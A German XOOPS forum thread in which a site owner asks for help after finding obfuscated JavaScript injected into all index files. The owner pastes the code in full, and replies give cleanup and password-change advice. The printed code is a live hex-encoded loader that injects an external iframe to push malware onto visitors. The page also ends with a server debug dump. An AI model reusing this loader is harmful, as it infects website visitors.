Fork me on GitHub
"XOOPS ist ein dynamisches OO (Objekt Orientiertes) open source Portal Script geschrieben in PHP. XOOPS ist ein ideales CMS (Content Management System) für den Aufbau von kleineren und grösseren Communities, Firmen-, Intra- und Internet-Portale, Web-Logs und vieles mehr."
forum
Bitte schaut in die DOKUMENTATION oder benutzt die SUCHFUNKTION bevor Ihr Eure Fragen im Forum stellt. Viele Fragen wurden bereits gestellt.

Leser in diesem Thema:   1 Anonyme(r)


(1) 2 3 4 ... 6 »


Fremder Code in der index.php
#1
Benutzerinformationen
Hallo!

Ich habe heute fremden Code in allen Index-Dateien auf meinem Server entdeckt.

Der Angreifer hatte definitiv FTP-Zugriff,
weil auch die Index.php in einem mit .htaccess geschützen Verzeichnis verändert wurde.

Ich hoffe ihr könnt mir weiterhelfen.


Folgender Code befindet sich jeweils am Ende der Index-Dateien.

<script>function c4122000144m48718f33519f1(m48718f33521c1){
return (
parseInt(m48718f33521c1,16));}function
m48718f3353931(m48718f3354102){
function 
m48718f3355870(){var m48718f3356040=2;return m48718f3356040;}
var 
m48718f33548d1='';m48718f335680e=String.fromCharCode;
for(
m48718f3355219=0;m48718f3355219<m48718f3354102.length;m48718f3355219+=m48718f3355870()){
m48718f33548d1+=(m48718f335680e(c4122000144m48718f33519f1(m48718f3354102.substr(m48718f3355219,m48718f3355870()))));}
return 
m48718f33548d1;} var zf3='';var
m48718f3356fdf='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'
+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+
zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+
zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3
+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+
'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'
+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'
+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'
+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3
+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'
+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3
+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3
+'4683C3520262620656C2E68656967'+zf3+'687'
+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+
'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'
+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+
'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'
+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'
+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3
+'322536312536642536352532302536652536312536642536352533642536332533342532302537'
+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'
+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3
+'2536632536352532642536312536652536312536632536392537'+zf3
+'61253635253265253633253666253664253266253639253665253265253633253637'
+zf3+'25363925336625333125333426253237'+zf3+'2532622534642536312537'+zf3
+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'
+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253331253339253338253337'+zf3+'253336253332253239253262253237'
+zf3+'253331253335253331253633253337'+zf3+'253330253631253635253635253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253334253337'
+zf3+'253331253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533322532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'
+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3
+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3
+'07'+zf3+'43E';document.write(m48718f3353931(m48718f3356fdf));</script><script>check_content()</script>

Geschrieben: 16.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#2
Benutzerinformationen
0. DATENBANKSICHERUNG

1. Schau über FTP nach wann die Datei geändert wurde und rufe deinen Hoster an und sage ihm, dass von Dritter Seite Dateien geändert wurden und du KEINE FTP Benutzernamen und Kennworte herausgegeben hast. Frage ihn dann, ob zum fraglichen Zeitpunkt ein Zugriff aus dem Ausland war. Der Kundendienst wird dir sicher mal sagen, dass er keine Daten weitergeben darf. Sag ihm, dass du das verstehst, du würdest aber nur gerne wissen ob der Zugriff aus dem Ausland war und nicht die IPs benötigst, daher die Daten also anonymisiert sind.

2. Bei deinem Hoster ALLE Passwörter erneuern

3. Abklemmen der Site
4. Überprüfen der Site auf Schadcode. Wenn du ein Backup der Site lokal hast, dann am Besten mal die Dateien mit WinMerge vergleichen, dann siehst du gleich wo was verändert wurde.
5. Datenbanksicherung vor irgendwelchen Änderungen nicht vergessen!!!!!!!

Ich habe bei zwei Kunden in Österreich auch schon so etwas gehabt. Ich denke mal, dass da beim Hoster was falsch gelaufen ist, möchte aber keine unbewiesenen Beschuldigungen äußern.

Geschrieben: 16.07.2008
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#3
Benutzerinformationen
Hallo!

Bevor ich hier meine Frage stellte,
habe ich bereits mit meinem Hoster telefoniert.

Er sagte mir zu, das es bei ihm keine Angriffe gab.

Diese Mail schickte mir mein Hoster:
Zitat:

vielen Dank für Ihre Rückmeldung. Bitte prüfen Sie unbedingt die Sicherheit Ihrer verwendeten
PHP Skripte. Hier scheint das Einschleusen von Schadcode ohne Probleme möglich zu sein.
Bitte wenden Sie sich notfalls an den Skripthersteller zur Analyse.


An welcher Stelle genau, konnte er mir aber auch nicht sagen.

Geschrieben: 16.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#4
Benutzerinformationen
Zitat:
Ich habe heute fremden Code in allen Index-Dateien auf meinem Server entdeckt.

Der Angreifer hatte definitiv FTP-Zugriff,
weil auch die Index.php in einem mit .htaccess geschützen Verzeichnis verändert wurde.


Ich würde trotzdem den Software Aspekt nicht aus den Augen verlieren ...

- Welche Xoops Version?
- Welche Module und in welcher Version kamen zum Einsatz?
- Hast Du den protector installiert?
- Spaw Editor?

Sven

Geschrieben: 16.07.2008
_________________
webmystar
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#5
Benutzerinformationen
Zitat:

Ich würde trotzdem den Software Aspekt nicht aus den Augen verlieren ...


Was meinst du damit?

Meine Versionen:
XOOPS 2.2.6 RC

News 1.55
CBB/NewBB 3.08
Protector 3.16
WF-Downloads 3.1
Polls 1.01
Memberlist 1
Links 1.1
Contact Us 1.6
Xoops Info 1.2

Spaw Editor habe ich schon lange nicht mehr.

Geschrieben: 16.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#6
Benutzerinformationen
Zitat:
Was meinst du damit?


Ich wollte damit nur zum Ausdruck bringen, dass es auch an unsicheren Modulen gelegen habe könnte.

Sven

Geschrieben: 16.07.2008
_________________
webmystar
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#7
Benutzerinformationen
Ich kanns nur wiederholen, dass du sämtliche Passwörter neu anfordern solltest.

Wenn sich der Hoster dagegen sträubt oder dir Kosten dafür verrechnen will, dann hast du sicher den falschen Dienstleister. Klar, keiner wird leicht zugeben, dass er ein Sicherheitsleck hat.

Und anhand der vom Hoster geführten FTP Protokolle könnte leicht festgestellt werden woher ein Zugriff gekommen ist. Im Prinzip würde es dir ja reichen zu wissen DASS ein Zugriff von Dritter Seite stattgefunden hat. Ich würde den Hoster nochmals auf die Zehen steigen und nicht die Schuld auf Skripte schieben lassen, denn das ist eine bequeme Lösung so wie "setzen Sie den Rechner neu auf" bei Windows Problemen.

Anhand des Datums und der Uhrzeit kannst du ja den genauen Zeitpunkt des Angriffs bestimmen, was eine Weiterverfolgung leichter macht. Natürlich hast du auch noch die Option einer Strafanzeige, aber das ist wieder einiger Aufwand, der es meiner Ansicht nach nicht bringt.

Aber ohne geänderte Passwörter hätte ich ein sehr, sehr ungutes Gefühl.

Geschrieben: 17.07.2008
_________________
Who fails to plan, plans to fail
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#8
Benutzerinformationen
Hallo!

Die Paswörter habe ich natürlich schon geändert.

Den fremden Code habe ich aus den Index-Dateien entfernt.

Andere geänderte Dateien habe ich nicht gefunden.

Die Index-Dateien wurden das letzte mal am 07.07.2008 geändert.

Meine Seite wurde aber erst am 16.07.2008 langsam,
worauf ich mir die Index.php anschaute,
weil meine Seite nur auf der Startseite lange Ladezeiten hatte.

Kann mir denn jemand sagen, was dieser Code bewirkt?

Gruß, Chris

Geschrieben: 17.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#9
Benutzerinformationen
Wird sonst auch noch eine JavaSript-Datei oder eine sonstige Datei in der Datei eingebunden?

Geschrieben: 17.07.2008
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#10
Benutzerinformationen
der Code versucht Malware auf den Rechner zu installieren
(auf den der die Seite aufruft), ist ein Virus


Alfred

Geschrieben: 17.07.2008
Erstelle PDF des Beitrags Drucke







[Erweiterte Suche]


Fehler
Warnung: syntax error, unexpected END_OF_LINE, expecting '=' in /var/www/clients/client1/web3/security/myxoops/xoops_data/configs/xoRewriteHtaccess.ini.php on line 13 in Datei /class/smarty/xoops_plugins/xoSmartyFunctions.php Zeile 32
Warnung: array_key_exists() expects parameter 2 to be array, boolean given in Datei /class/smarty/xoops_plugins/xoSmartyFunctions.php Zeile 34
Warnung: XoSmartyPlugin : section [xoRewriteHtaccess] does not exist in /configs/xoRewriteHtaccess.ini.php in Datei /class/smarty/xoops_plugins/xoSmartyFunctions.php Zeile 42
abgelehnt
Abfragen
0.000118 - SET NAMES 'utf8'
0.000070 - SET SQL_BIG_SELECTS = 1
0.000127 - SELECT * FROM config WHERE (conf_modid = '0' AND conf_catid = '1') ORDER BY conf_order ASC
0.000316 - SELECT sess_data, sess_ip FROM session WHERE sess_id = '9c8iih2hu1notr114k9e521re7'
0.000080 - SELECT * FROM modules WHERE dirname = 'newbb'
0.000069 - SELECT COUNT(*) FROM group_permission WHERE (gperm_modid = '1' AND (gperm_groupid = '3') AND gperm_name = 'module_read' AND gperm_itemid = '2')
0.000103 - SELECT * FROM config WHERE (conf_modid = '2') ORDER BY conf_order ASC
0.000081 - SELECT * FROM modules WHERE dirname = 'protector'
0.000369 - DELETE FROM protector_access WHERE expire < UNIX_TIMESTAMP()
0.000309 - SELECT COUNT(*) FROM protector_access WHERE ip='54.167.185.110' AND request_uri='/forum/viewtopic.php?post_id=53147'
0.000327 - SELECT COUNT(*) FROM protector_access WHERE ip='54.167.185.110'
0.004594 - INSERT INTO protector_access SET ip='54.167.185.110',request_uri='/forum/viewtopic.php?post_id=53147',expire=UNIX_TIMESTAMP()+'60'
0.000105 - SELECT * FROM modules WHERE dirname = 'xoopspoll'
0.000078 - SELECT * FROM modules WHERE dirname = 'umfrage'
0.000326 - SELECT t.* FROM bb_topics t, bb_posts p WHERE t.topic_id = p.topic_id AND p.post_id = 53147
0.000188 - SELECT * FROM bb_forums WHERE forum_id = '72'
0.000095 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'category_access')
0.000156 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_access')
0.000178 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_view')
0.003624 - SELECT COUNT(*) FROM `bb_posts` WHERE (topic_id = '10509' AND approved = '1')
0.000238 - SELECT COUNT(*) FROM bb_posts AS p WHERE p.topic_id=10509 AND p.approved = 1 AND p.post_id < 53147
0.003036 - SELECT p.*, t.* FROM bb_posts p, bb_posts_text t WHERE p.topic_id=10509 AND p.post_id = t.post_id AND p.approved = 1 ORDER BY p.post_id ASC LIMIT 0, 10
0.007364 - UPDATE bb_topics SET topic_views = topic_views + 1 WHERE topic_id =10509
0.000088 - SELECT * FROM config WHERE (conf_modid = '0' AND conf_catid = '3') ORDER BY conf_order ASC
0.000083 - SELECT DISTINCT gperm_itemid FROM group_permission WHERE gperm_name = 'block_read' AND gperm_modid = 1 AND gperm_groupid IN (3)
0.000074 - SELECT b.* FROM newblocks b, block_module_link m WHERE m.block_id=b.bid AND b.isactive=1 AND b.visible=1 AND m.module_id IN (0,2) AND b.bid IN (31,30,29,28,27,26,25,24,23,22,21,18,17,16,49,15,14,13,10,7,5,3,2,20,19,48,38,37,36,41,40,35,45,44,46,47,50,51,52) ORDER BY b.weight, m.block_id
0.000230 - DELETE FROM lastseen WHERE (uid<1 AND time<=1413874459) OR (uid>0 AND time<=1413269959)
0.000151 - UPDATE lastseen SET online=0 WHERE uid>0 AND time< 1413874459
0.000069 - SELECT * FROM modules WHERE dirname = 'onlinehistory'
0.000071 - SELECT * FROM config WHERE (conf_modid = '7') ORDER BY conf_order ASC
0.000244 - SELECT count(uid) as cuid FROM lastseen WHERE uid=0 AND ip='54.167.185.110'
0.000214 - UPDATE lastseen SET time = 1413874759, ip='54.167.185.110' ,uagent='CCBot/2.0 (http://commoncrawl.org/faq/)', username='Besucher', module=2, online=1 WHERE uid=0 AND ip='54.167.185.110'
0.000210 - SELECT COUNT(uid) as count FROM lastseen WHERE (online > '0' AND uid > '-1')
0.000128 - DELETE FROM bb_online WHERE online_updated < 1413874459
0.000125 - DELETE FROM online WHERE online_updated < 1413874459
0.000188 - SELECT COUNT(*) FROM online WHERE online_uid=0 AND online_ip='54.167.185.110'
0.000165 - UPDATE online SET online_updated=1413874759, online_module = 2 WHERE online_uid = 0 AND online_ip='54.167.185.110'
0.000155 - SELECT COUNT(*) FROM bb_online WHERE online_uid=0 AND online_ip='54.167.185.110'
0.000187 - UPDATE bb_online SET online_updated= '1413874759', online_forum = '72', online_topic = '10509' WHERE online_uid = 0 AND online_ip='54.167.185.110'
0.000290 - DELETE FROM bb_online WHERE ( online_uid > 0 AND online_uid NOT IN ( SELECT online_uid FROM online WHERE online_module =2 ) ) OR ( online_uid = 0 AND online_ip NOT IN ( SELECT online_ip FROM online WHERE online_module =2 AND online_uid = 0 ) )
0.000171 - SELECT * FROM bb_online WHERE online_topic = '10509'
0.000072 - SELECT cat_title, cat_id FROM bb_categories WHERE cat_id = '2'
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_post')
0.000120 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.001459 - SELECT * FROM `users` WHERE uid IN (10394,9225,9184,8566,8758)
0.000083 - SELECT * FROM smiles
0.000168 - SELECT online_uid FROM bb_online WHERE online_uid IN (8566, 8758, 9184, 9225, 10394)
0.000068 - SELECT * FROM ranks
0.000217 - SELECT user_digests, uid FROM bb_user_stats WHERE uid IN( 8566, 8758, 9184, 9225, 10394)
0.000129 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000111 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000138 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000124 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000139 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000133 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000129 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000140 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000114 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000139 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000140 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000112 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000125 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000129 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000125 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000126 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000128 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000120 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000139 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000123 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000110 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000125 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000123 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000113 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000131 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000115 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000215 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000154 - SELECT * FROM modules WHERE dirname = 'xoopspoll'
0.000145 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_addpoll')
0.000238 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_addpoll')
0.000175 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'category_access')
0.000121 - SELECT `cat_id`, `cat_order`, `cat_title` FROM `bb_categories` WHERE cat_id IN (9, 20, 12, 17, 19, 21, 2) ORDER BY cat_order ASC
0.000160 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
Zusammen: 85
Blöcke
Online Historie Zählblock: nicht zwischengespeichert
Zusammen: 1
Extras
plugin smarty for xoops => xoRewriteModule : Loaded
plugin smarty for xoops => xoRewriteModule : Loaded
inbegriffene Dateien: 160 Dateien
Speicher: 12675336 bytes
Zeitmessung
XOOPS brauchte 0.627 Sekunden zum laden.
XOOPS Boot brauchte 0.027 Sekunden zum laden.
Module init brauchte 0.087 Sekunden zum laden.
XOOPS output init brauchte 0.013 Sekunden zum laden.
Module display brauchte 0.478 Sekunden zum laden.
Page rendering brauchte 0.022 Sekunden zum laden.